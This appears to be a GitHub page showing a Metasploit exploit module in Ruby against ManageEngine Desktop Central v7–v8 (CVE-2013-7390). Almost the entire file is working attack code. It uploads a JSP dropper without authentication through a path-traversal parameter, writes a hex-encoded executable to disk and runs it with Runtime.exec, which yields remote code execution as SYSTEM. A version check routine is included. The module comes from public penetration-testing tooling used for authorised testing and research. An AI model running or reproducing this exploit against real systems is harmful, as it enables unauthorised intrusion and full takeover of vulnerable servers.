Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
metasploit-framework/modules/exploits/windows/http/desktopcentral_file_upload.rb /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
176 lines (144 sloc)
5.29 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = ExcellentRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| include Msf::Exploit::EXE | |
| include Msf::Exploit::FileDropper | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload', | |
| 'Description' => %q{ | |
| This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to | |
| v8 build 80293. A malicious user can upload a JSP file into the web root without | |
| authentication, leading to arbitrary code execution as SYSTEM. | |
| }, | |
| 'Author' => | |
| [ | |
| 'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| ['CVE', '2013-7390'], | |
| ['OSVDB', '100008'], | |
| ['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'], | |
| ['URL', 'https://seclists.org/fulldisclosure/2013/Nov/130'], | |
| ], | |
| 'Platform' => 'win', | |
| 'Arch' => ARCH_X86, | |
| 'Targets' => | |
| [ | |
| [ 'Desktop Central v7 - v8 build 80292 / Windows', {} ] | |
| ], | |
| 'Privileged' => true, | |
| 'DefaultTarget' => 0, | |
| 'DisclosureDate' => '2013-11-11' | |
| )) | |
| register_options([Opt::RPORT(8020)]) | |
| end | |
| def upload_file(filename, contents) | |
| res = send_request_cgi({ | |
| 'uri' => normalize_uri('agentLogUploader'), | |
| 'method' => 'POST', | |
| 'data' => contents, | |
| 'ctype' => 'text/html', | |
| 'encode_params' => false, | |
| 'vars_get' => { | |
| 'computerName' => 'DesktopCentral', | |
| 'domainName' => 'webapps', | |
| 'customerId' => '..', | |
| 'filename' => filename | |
| } | |
| }) | |
| if res && res.code == 200 && res.body.to_s.empty? | |
| return true | |
| else | |
| return false | |
| end | |
| end | |
| # Test for Desktop Central | |
| def check | |
| res = send_request_cgi({ | |
| 'uri' => normalize_uri("configurations.do"), | |
| 'method' => 'GET' | |
| }) | |
| if res && res.code == 200 | |
| build = nil | |
| if res.body.to_s =~ /ManageEngine Desktop Central 7/ || | |
| res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 | |
| print_status("Detected Desktop Central v7") | |
| elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || | |
| res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ | |
| if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) | |
| build = $1 | |
| print_status("Detected Desktop Central v8 #{build}") | |
| else # DC v8 (earlier versions) | |
| print_status("Detected Desktop Central v8") | |
| end | |
| elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) | |
| build = $1 | |
| end | |
| if build.nil? | |
| return Exploit::CheckCode::Unknown | |
| elsif Rex::Version.new(build) < Rex::Version.new("80293") | |
| return Exploit::CheckCode::Appears | |
| else | |
| return Exploit::CheckCode::Safe | |
| end | |
| end | |
| Exploit::CheckCode::Unknown | |
| end | |
| def exploit | |
| print_status("Uploading JSP to execute the payload") | |
| exe = payload.encoded_exe | |
| exe_filename = rand_text_alpha_lower(8) + ".exe" | |
| dropper = jsp_drop_and_execute(exe, exe_filename) | |
| dropper_filename = rand_text_alpha_lower(8) + ".jsp" | |
| if upload_file(dropper_filename, dropper) | |
| register_files_for_cleanup(exe_filename) | |
| register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}") | |
| else | |
| fail_with(Failure::Unknown, "#{peer} - JSP upload failed") | |
| end | |
| print_status("Executing payload") | |
| send_request_cgi( | |
| { | |
| 'uri' => normalize_uri(dropper_filename), | |
| 'method' => 'GET' | |
| }) | |
| end | |
| def jsp_drop_bin(bin_data, output_file) | |
| jspraw = %Q|<%@ page import="java.io.*" %>\n| | |
| jspraw << %Q|<%\n| | |
| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| | |
| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| | |
| jspraw << %Q|int numbytes = data.length();\n| | |
| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| | |
| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| | |
| jspraw << %Q|{\n| | |
| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| | |
| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| | |
| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| | |
| jspraw << %Q| comb <<= 4;\n| | |
| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| | |
| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| | |
| jspraw << %Q|}\n| | |
| jspraw << %Q|outputstream.write(bytes);\n| | |
| jspraw << %Q|outputstream.close();\n| | |
| jspraw << %Q|%>\n| | |
| jspraw | |
| end | |
| def jsp_execute_command(command) | |
| jspraw = %Q|\n| | |
| jspraw << %Q|<%\n| | |
| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| | |
| jspraw << %Q|%>\n| | |
| jspraw | |
| end | |
| def jsp_drop_and_execute(bin_data, output_file) | |
| jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) | |
| end | |
| end |